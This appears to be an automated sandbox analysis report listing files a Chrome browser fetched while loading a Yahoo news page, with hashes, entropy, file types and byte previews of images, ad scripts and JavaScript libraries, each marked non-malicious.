                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/15s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/15s/match/image.jpeg*~hmac=dd7c6919411a66c5c1c84f1324fb3749cf2dc8ce614049ca7bda75fd641a984b
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000...........".......................................I........................!.1AQ."aq.2..#....BR..3b....$Cr.U...S...&6DTs.................................*........................!1AQ."2aq..$................?.(..Q4.._V|..R.O..@......}4..)i.i.....ii..M>......4..@..H.i..@..M.M-4X..,Q...E...lQt..L..(.ii. x..OM8Z....D.SX..E...,U..Q+.Q`...h...z.,.i..Vc..{QE.u....:i.....Pq.N....O...A{.d..4.h......:+.'...m&,.D.c..Z...X....u..zn3..DH..-....u.u.....!.~.+o.B<...._.....>.....,.~.A......A\..>N...Tk[|;ahC7.c...C$..#...t..&.wlN\}(......{Rz....Q.:0_B;..1(..{Ua..O...=.qku*...5.&w..../,O....../.XH:.....rNM,...Q..K99..O...K.....-.!.R~....[.h...-....S.o.o.H.)b.....Z...S.....!.X.i.......V..Z;.X.b.(.ii.b.X4..t..E..b.(..ZF<.u6..b..M4.N.....6.m4X0X..(Z}4.T.M-4m4.Q`...F.KM. 8..E.H-. Zii...>.,(.Zp.m..E+........g
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8353), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8353
                                                                                                                                                                                                                  Entropy (8bit):5.1972886663817555
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:11CF4F9BFF98FC79F8EECF2894832023
                                                                                                                                                                                                                  SHA1:92025912195839DD8724CB90840A5E584DD2DD54
                                                                                                                                                                                                                  SHA-256:2061ABEA33CED95A6B541BD41CAB6EC3FBBD789ACD1A6A93213F98CBA182AD6F
                                                                                                                                                                                                                  SHA-512:9368BAD1C1EBBB82EE69A45D728F5B66643520F828D1AB44A61D227B5408F4C607867DFCF2C8BA43F913E92D26870CE96412E19F46F90C8A95E69FB7BC1C0E34
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-benji"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):9368
                                                                                                                                                                                                                  Entropy (8bit):7.923175649418041
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CD3B8237D10EE31572BE558026409CD7
                                                                                                                                                                                                                  SHA1:71B2123B119921D1EF74757AA2A15FFF06DD69A0
                                                                                                                                                                                                                  SHA-256:350314F617327EC7E4B2A0E7C267DA803914DA02C60C5B49EFACB0BC14D6B877
                                                                                                                                                                                                                  SHA-512:5213F104B42CA0E1A450B553BE0A097414445C9A5C71422ED769479FDC83B41C351EB6A7F174CD09FDDB46490FDB98B21E2B51417A6E091A773AE7CC6D429054
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/50s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/50s/match/image.jpeg*~hmac=c8a933bb98bac8e6e10506c6ecc563f78823c3216fe56c281233a21febb727d3
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000..........."........................................G.........................!1..AQRa..."q..2BS.#3r..Cbc..$s.....46Ddt.................................!........................!1A.Q".............?..............................................................................................................................................W..=,S.#7.>@.N...p}..^.m.....c+jZ..(...kZ...@..gX...WB.KZK.w..r.0.?x...].U>..:JA/'....&.......M..81L@m]R5......q......q@......@s.l....A...A..{.i9.f..4H....n..N.C.%a.....(....]..m.6s9...hI.Y...].lW.cx...1:..Z....+v...l<...bM}C._T.R2.D.....N.=c}.V..x...X&t...'@~ ."....iG....p.:.... .8:3..0.8i...mw.'...>..Hp.........a.....:J.....]+.`;........EC...t.._....7;f..X. .TQ{8.f...ki.$ssr...y.....Gq...m. ..xY.=}TQFs1...kM.p..U-..6..n!V........-g.u"._$.dX.........ND...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (23479), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):23479
                                                                                                                                                                                                                  Entropy (8bit):5.181521598468942
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:E6A743E22F5B7027F77359F0A549572B
                                                                                                                                                                                                                  SHA1:3EE7D7C1F50B654AFF770E4EED916502D7D62B7B
                                                                                                                                                                                                                  SHA-256:E6C22E612E82D6AF3F495357F5EF64A81467312A4A817F3625B15490629257EA
                                                                                                                                                                                                                  SHA-512:6A440F8772A29CF710417746BBF0AF9994C6C609BAD6B313DAB3FFC8F73BB4947E7AF8D52D3DEEBC78B4863BC961F5501A03768C78AD2BECC490CBB0838819FB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/notifications/js/sh-5.17.91.js
                                                                                                                                                                                                                  Preview:!function(){var r="BrowserSubscriptionHelper",i=["chrome","chrome mobile"],p="error",f="info",n="pushNotifications",o="undefined",t="Unsupported Browser.",u="granted",a="denied",c="subscriptions",s="type",d="push",e="display-push-promos",l="js-push-subscribe",h="rapidnofollow",b="subscriptionFail",m="Permission denied by user";function g(e,n,i){this.init(e,n,i)}if(g.prototype={init:function(e,n,i){var r=this;r.beaconer=n,r.tracker=i,r.config={appServerPubKey:e.appServerPubKey,bucket:e.bucket,confirmationNotification:e.confirmationNotification||{},enableIndexedDbDurationBeacon:e.enableIndexedDbDurationBeacon||!1,enablePermissionChangeBeacon:e.enablePermissionChangeBeacon||!1,overlay:e.overlay||{},resubscribeOnChurn:e.resubscribeOnChurn||!1,serviceWorkerScope:e.serviceWorkerScope||"/",serviceWorkerUrl:e.serviceWorkerUrl,spaceId:e.spaceId,subscriptionService:e.subscriptionService||{},supportedBrowsers:e.supportedBrowsers||{},userAgent:e.userAgent||{}},r.appServerPubKeyArr=r.urlB64ToUint8A
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                                  Entropy (8bit):4.43085190156809
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9ACA9D15ADAFBE7AAECCAB50F115CD8B
                                                                                                                                                                                                                  SHA1:0FAF57FCB79A2B2D7F4161FFAFB7D9679D3F5DF0
                                                                                                                                                                                                                  SHA-256:189B8ED64093B12937354B2EF71CCF1DF59690D90432241A10FE1CB25000ACBA
                                                                                                                                                                                                                  SHA-512:A561D48D340192C05E37C089CEE1BB3FE00553FCC055C478C86A7C43C41A6C2CF740E07F678D09025D8B72E2D7E26D9F4E17A20BA2F0B24D559928DAAB61AD94
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:TRC.getRTUS({"status":"Unknown","userid":""});
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):48866
                                                                                                                                                                                                                  Entropy (8bit):5.504346842597828
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:96472A38390DF2E54C5940F649D01D3B
                                                                                                                                                                                                                  SHA1:FA306CE0E85B8DD895CEA6CD002FE0E82B58DDFD
                                                                                                                                                                                                                  SHA-256:82B203C070E5806EE134548DFC6D84C9AE816F73B8B40DA02B24D61900251F01
                                                                                                                                                                                                                  SHA-512:E702B8F2DCC752A9D7A3A1BC161FA074C8A09D57CAA2306BE5058DE1D3FF979B58EE194571DB10215086216E6E219871C6847AFC300599DF52E0796D6A72F0FD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"the-yodel;news;celebrities","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a077000000CFoGyAAL;revsp:the_yodel_717;lpstaid:0c861ab1-6e80-4662-9bda-b1ac18b5e10e;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Hurricane_Helene_%281958%29;Hurricane_Katrina;Getty_Images;Abbott_Elementary;Caitlin_Clark;Yahoo;Joaquin_Phoenix;Power_outage;Milwaukee_Brewers;Quinta_Brunson;Israeli_bombing_of_the_Gaza_Strip;Ian_Ziering;Autumn_leaf_color;Rob_McElhenney;New_York_Mets;Entertainment_Weekly\" ctopid=\"1035500;1104500\" hashtag=\"the-yodel;news;1035500;1104500\" rs=\"lmsid:a077000000CFoGyAAL;revsp:the_yodel_717;lpstaid:0c861ab1-6e80-4662-9bda-b1ac18b5e10e;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=helene-becomes-deadliest-hurricane-since-katrina-irs-expands-free-t
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):37774
                                                                                                                                                                                                                  Entropy (8bit):7.957773105783594
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:71BD98CBA7BCA35F323E6606218D3940
                                                                                                                                                                                                                  SHA1:A6748D1EB750D1313FC5D9D85054F0E424819649
                                                                                                                                                                                                                  SHA-256:D04943AD07B342E92BE3D1F4BD73136226DCF2382B3B6AD9CA38569DD5009E68
                                                                                                                                                                                                                  SHA-512:C558B24B78D6A8451A570466AD696E568157F52C5B565EE4656F93AD5AB40FA2F350B3BBAD0AF301DB6D5716805E7AEDFBD1DBA22A2E1C160DBE1D2E1DB55FF0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C.....................................................................................................................J.........................!.1.AQ."2aq.....#BR...b.Cr....$34c....S..&5s...................................,........................!1..A.Q."2#B.3CSaq............?...%kk".M...>.-r/h].....-..q.!c.=E}?....u.......n;.....'..g,<.oLf.....W....'.....
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):9971
                                                                                                                                                                                                                  Entropy (8bit):7.91953468565858
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A9C4614C5C6A34420DF1A913C7776600
                                                                                                                                                                                                                  SHA1:27AC43B541468CAB55D06D35183D843B97D1B843
                                                                                                                                                                                                                  SHA-256:A59A76473DE69CBE4C6994E8CD86DDC05E3B2D7748FE3B9E0395C8D65445813C
                                                                                                                                                                                                                  SHA-512:B147B8DBCD936643409FFFE34514F4032AE4D905CC6FDB224B09BCDBA79D0B72FF9CAA30D3772FEB47BE2EC195606EC6B5F0A315BBCD4D0E2FE04EE25C7CDCEB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/1m0s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/1m0s/match/image.jpeg*~hmac=02669d2a6900eb3e6fff3131ffe13f952b907b1135616e9b9ddf5723549f94a4
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000..........."........................................C.........................!..1AQ."Ra..bq..#2B..3S...$cr..46Ct..Ds...............................%........................!1A.Q."#2a.............?.........................................................................................................................................mQYAM]....)................V.1:...G[R..@...Z...z....gx..2.P...%.;..n.0....G..^:,O..4.gIH%.."Rd..L.jl.t.....)....#P..;....Y[.:,..``.j.D{.7.g...$.......{.[I..6...........<A*....Z.R....U.<F.f.|.v.....]...b.c......g..f..[.q..l...&....*..FY...Z.v.....g.k.....0..gB.k`{.....t..J=..f5...0Dq.....+..F..v..q?n..h..[f.........a.....>J.....]+.`<@.@..A.wQP.48.)........puc.r..AQE.q..Y....4H...=.o..6 ..}....6.......i.d4..QE...2g5.7...MT.......X.x..L...XX. ."........:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65321), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):150766
                                                                                                                                                                                                                  Entropy (8bit):5.536320678156018
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:35B67764AEBBBDBDA3246084E3ABCB5E
                                                                                                                                                                                                                  SHA1:39F36AA53ADBDDB43C9B164890F8FA5C24420CBC
                                                                                                                                                                                                                  SHA-256:4F5FD15E865983A64C335C6C08CD9578D617C26784715522FABD2427B3A1F7D6
                                                                                                                                                                                                                  SHA-512:46997EC9073870C437FE704F25A3FCFAA5F2147E64EC30BFA5DD10D22AB6677943C71AB1099DCE86943ED2804A5FCFEE4C6CE63B6EFE7AC1FCC2F32ECAD69E4A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/rx/ev/builds/1.9.1/pframe.js
                                                                                                                                                                                                                  Preview:(()=>{var t={1556:function(t,i){"use strict";var e=this&&this.__spreadArrays||function(){for(var t=0,i=0,e=arguments.length;i<e;i++)t+=arguments[i].length;var s=Array(t),n=0;for(i=0;i<e;i++)for(var o=arguments[i],l=0,a=o.length;l<a;l++,n++)s[n]=o[l];return s};Object.defineProperty(i,"__esModule",{value:!0});var s=function(){function t(t){void 0===t&&(t="anonymous"),this.name=t,this.l={},this.u=0}return t.prototype.destroy=function(){this.l={}},t.prototype.addEventListener=function(t,i,e){return this.l?this.A(t,i,e):""},t.prototype.addEventListeners=function(t,i,e){var s=this,n={};return this.l&&t.length?(t.forEach((function(t){var o=i.bind(e,t);n[t]=s.A(t,o,e)})),n):n},t.prototype.on=function(t,i,e){return Array.isArray(t)?this.addEventListeners(t,i,e):this.addEventListener(t,i,e)},t.prototype.removeEventListener=function(t,i){this.l&&t in this.l&&Object.prototype.hasOwnProperty.call(this.l[t],i)&&delete this.l[t][i]},t.prototype.removeEventListeners=function(t){if(this.l&&t)for(var i=
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):48316
                                                                                                                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):23376
                                                                                                                                                                                                                  Entropy (8bit):7.97311642043942
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D3E5FBD62F28E631BF23C74D83C2408F
                                                                                                                                                                                                                  SHA1:0E0BC6EE75F2884F2870EF4674BB0371E09F6D33
                                                                                                                                                                                                                  SHA-256:924CC08F00171E9AF36DDC5EEF6BC4305A80DDE451C71FF20652211824D7D387
                                                                                                                                                                                                                  SHA-512:AAE92B81B807CCBA2EAE3A7CB44C888FB43836B7722994BE2A185913CD1C8449DB2650EAFE39ECD99CED38B776C7F9C07BE0090FD5A35098BDAE2F8EAC90D200
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/xWSKg2gvHBlRH2tB5denqg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/ap.org/72dcb8e7bc4b70bb84806cdce36c3bdd.cf.webp
                                                                                                                                                                                                                  Preview:RIFFH[..WEBPVP8X.... .........ICCP0......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../....VP8 .X......*....>y6.H$..!.5....ig..].b...D.....iZ...O.xG.......~...u&..9...c.oR.6z.D..w..G!~,........=6M7.........t9.....:.V..Z}....0...).4}..ze.....Z....s.Y.S..H..}..O....8..X...<F_;...,....1m.@.....1o<..0.O.......* ow...+..s...#..|.&...(.$..c.a<HL..Y.\..t*J.r.........Z..>.}...c,......L. ....1v.=.6..g.....dVV[..#.rJ......Bp..Vd..7G.j..4\V-...<.vL..A.W$..j......|{..iu.0~8..\...(.o:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14613
                                                                                                                                                                                                                  Entropy (8bit):7.94873556257897
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0D36AC6AA093E3799EB15E684418386A
                                                                                                                                                                                                                  SHA1:27EA3234B4941056150BB4DAA7020DA91B10482E
                                                                                                                                                                                                                  SHA-256:148E9CCE337F335D53BBAB2564A4773290384D5ABF93137AFD0F23FF9860C66A
                                                                                                                                                                                                                  SHA-512:F82324AD3F7E213D88FC5A9D4A088963A374C5C8AD4104C25D8A92EADF9A6D6F5A617BF5B8DCBA0DD7CD79A4A04950CD8903058B048629B40537B2EE651EA62F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............C....................................................................C.........................................................................d............................................D..........................!1..AQa."2BRq.....#b..$r...34C.5..%&D.................................)......................!..1.A.".#2Qa$BqC............?...6.`Z%........f+ ..B.4.....(.\h..X.P..C...vUt...D[...R..8..I.{..+...;...'.?.W..#O.u+..>y.6B.[bDz.....<......Q+.i).G...2"%.q..K......Lhs....@L...3g..4....v..4......(.1....e1....y.....s.e.....PL..Y..vS..c.......bn#&.'.P..........Y.%".{....t......#.pG....J...N0..*bl..fH.h..Rl.a...&..$..&[Q.....Z.z.&t.,...^t......XO.$.J.L.d<..*.......90B.......].j.....(.T..`....o.U.g...PPfo.,...%;..*...Vw7....~..Y...........p.......c........&6...C.......0.z...1.4GOax...qU..Fr....^.D...[~.e...r.Q/.i...<.m..R;|..c......Jd.....t.{>}OKeuW......t%....m......l..&Q.2&Y......k.4E....,..3'...$.TT....,[x..q+.$.].p2.3(..x..9k.Mp..q.}4IuJ...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                  Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                  SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                  SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                  SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (21224)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24203
                                                                                                                                                                                                                  Entropy (8bit):5.349731623672621
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F1DFC75C82E12DFE846D5593978E422A
                                                                                                                                                                                                                  SHA1:12E580A708B09C9A8F4CA7CCBE9DD7DF32EDEE60
                                                                                                                                                                                                                  SHA-256:08204982C484FAF6890C60557A4E642971F17625DDDDC0559DC0E3CA728AC9E0
                                                                                                                                                                                                                  SHA-512:623412E6D454104251215E38A0F365F879EC70F77306769F5FA40E144C0EAB43237D1FE13B92031AD5848071A6A8910F01576F079E1A0904F4D8DD8959D922A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}},ea=function(a){return a.raw=a},fa="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};da("Object.assign",f
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (60378), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):60378
                                                                                                                                                                                                                  Entropy (8bit):5.226751934675976
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C1FBB54C4F22838F40CE99E7418FCD97
                                                                                                                                                                                                                  SHA1:62D8945137AE75C185903E0552C920E03E5577E5
                                                                                                                                                                                                                  SHA-256:C17C2FCA2732465B44F96FE2E566A4E016E4A56D7C40169E5E84F501BA750E5D
                                                                                                                                                                                                                  SHA-512:C5178DF676E1BD912502AC86DE7E270B76FD321B229E320754E455AD6620FCEDCFED5515AA9192ECA09074E892916978E0A3F412C6C8757AEC88900566C56B48
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-core-1.65.1-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer",[],t):"object"==typeof exports?exports.wafer=t():e.wafer=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functi
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
